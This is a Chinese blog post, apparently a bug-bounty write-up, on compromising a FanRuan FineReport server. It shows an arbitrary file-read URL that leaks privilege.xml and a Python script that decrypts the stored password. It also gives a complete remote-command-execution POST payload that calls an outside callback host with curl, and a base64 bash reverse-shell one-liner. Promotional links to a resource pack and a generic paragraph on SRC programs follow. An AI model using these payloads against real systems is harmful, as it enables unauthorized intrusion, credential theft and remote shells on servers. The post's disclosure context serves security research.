「网络安全」一次SRC挖掘经历

本文仅供网络安全学习研究,违F绕路

资产发现

首先是信息收集子域名,谷歌语句直接site:xxx.com -www,一个登录口网站吸引了我的注意力。

在这里插入图片描述

我点击电信、网通、自动的时候,发现域名跳转到了真实IP

在这里插入图片描述

这样,就可以对真实IP进行端口扫描->目录扫描一把梭了,发现在8080端口发现ReportServe部署页面。

在这里插入图片描述

接着就对帆软的历史漏洞进行测试了。

任意文件读取获取密码解密登录后台

view-source:http://xxx.xxx.xxx.xxx:8080/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml

刚开始的时候是空白页,查看源代码才发现信息

在这里插入图片描述

可以看到用户为posun,密码需要解密一下

解密脚本:

cipher = '___0022007c0039003b005100e3' #密文
PASSWORD_MASK_ARRAY = [19, 78, 10, 15, 100, 213, 43, 23] #掩码
Password = ""
cipher = cipher[3:] #截断三位后
for i in range(int(len(cipher) / 4)):
    c1 = int("0x" + cipher[i * 4:(i + 1) * 4], 16)
    c2 = c1 ^ PASSWORD_MASK_ARRAY[i % 8]
    Password = Password + chr(c2)
print (Password)

解密得到123456,问题是拿到哪里登录呢,突然想到刚才有个数据决策系统,拿去登录刚才的数据决策系统.

在这里插入图片描述

成功进入后台,然而高兴的太早了,因为该站长注册码到期了,且没有什么敏感信息。SRC也是反馈危害性不大,不能收,没办法,只能另寻途径了。

【→所有资源资料文末获取←】
1、网络安全学习路线
2、电子书籍(白帽子)
3、安全大厂内部视频
4、100份src文档
5、常见安全面试题
6、ctf大赛经典题目解析
7、全套工具包
8、应急响应笔记

帆软报表FineRePort未授权远程命令执行漏洞

影响版本:

    • 帆软报表 FineRePortv8.0
    • 帆软报表 FineRePortv9.0
xxx.com/WebReport/ReportServer?op=fr_log&cmd=fg_errinfo&fr_username=admin

这个接口 打开 点查询 burp拦截数据包 替换post的内容

__parameters__={"LABEL1":"TYPE:","TYPE":"6;CREATE ALIAS RUMCMD FOR \"com.fr.chart.phantom.system.SystemServiceUtils.exeCmd\";CALL RUMCMD('curl http://uki7s7.ceye.io');select msg, trace, sinfo, logtime from fr_errrecord where 1=1","LABEL3":"START_TIME:","START_TIME":"2020-08-11 00:00","LABEL5":"END_TIME:","END_TIME":"2020-08-11 16:41","LABEL7":"LIMIT:","LIMIT":2}

便操作了一下,前提是需要得知用户名

漏洞地址:
http://xxx.xxx.xxx.xxx:8080/ReportServer?op=fr_log&cmd=fg_errinfo&fr_username=posun,这里需要把username改为刚刚的用户名。

在这里插入图片描述

点击查询抓包改包,这里先是简单的ceye回显,改包后一直forward

在这里插入图片描述

在这里插入图片描述

可以看到,我的ceye收到回显,说明该漏洞是存在的,为了证明危害性,我后面继续了反弹shell操作

bash -c {echo,base64编码}|{base64,-d}|{bash,-i}

VPS监听7777端口,如图下 反弹shell成功

在这里插入图片描述

备注:刚开始对面审核SRC愣是死活复现不出来,手把手教学了,这里有几个问题注意下,查询不能太频繁 容易并发数满,需要等一段时间,我后面第二天并发数才清空.

总结

  • 多观察细节,比如刚刚的真实IP就冒出来了
  • 遇到危害性不大漏洞不要慌,留着还能组合其它的漏洞.

网络安全学习资源分享:

给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

因篇幅有限,仅展示部分资料,朋友们如果有需要全套《网络安全入门+进阶学习资源包,需要点击下方链接即可前往获取

读者福利 | CSDN大礼包:《网络安全入门&进阶学习资源包》免费分享 (安全链接,放心点击)

图片

同时每个成长路线对应的板块都有配套的视频提供:

图片

实战训练营

在这里插入图片描述

面试刷题

在这里插入图片描述

视频配套资料&国内外网安书籍、文档

当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料

图片
所有资料共282G,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,可以扫描下方二维码或链接免费领取~

读者福利 | CSDN大礼包:《网络安全入门&进阶学习资源包》免费分享 (安全链接,放心点击)

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
企业在进行漏洞挖掘时,需要掌握一些SRC(Security Researchers and Coordination)漏洞挖掘技巧。首先,企业应该建立一个SRC计划,鼓励安全研究人员积极参与漏洞挖掘,并提供有意义的奖励计划来激励他们的参与。 其次,为了有效地挖掘漏洞,企业需要建立一个漏洞协作平台,以便安全研究人员能够及时报告发现的漏洞,并与企业的安全团队进行合作。这个平台应该提供一个安全的渠道,使研究人员能够匿名地提交漏洞报告,并与企业安全团队进行有效的沟通和协作。 此外,企业还应该定期在SRC平台上发布有关其系统、应用程序或网络环境中存在的已知漏洞的信息。这样,安全研究人员就可以更集中地针对这些漏洞进行挖掘,从而帮助企业及时发现并修复漏洞,提高系统的安全性。 此外,企业还可以通过组织SRC漏洞挖掘大赛或Hackathon等活动,吸引更多的安全研究人员参与其中。这些活动不仅可以帮助挖掘出更多的潜在漏洞,还能为企业塑造一个安全意识的企业形象。 最后,企业还应该与其他企业或组织建立合作关系,共享漏洞信息和挖掘经验。这样可以提高安全研究人员的技术水平,并加强整个行业对漏洞挖掘的防御能力。 综上所述,企业在进行SRC漏洞挖掘时,需要建立SRC计划,建立漏洞协作平台,定期发布已知漏洞信息,组织相关活动,以及与其他企业合作共享资源,这些技巧将有助于提升漏洞挖掘的效果,并加强整个企业的安全防御能力。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值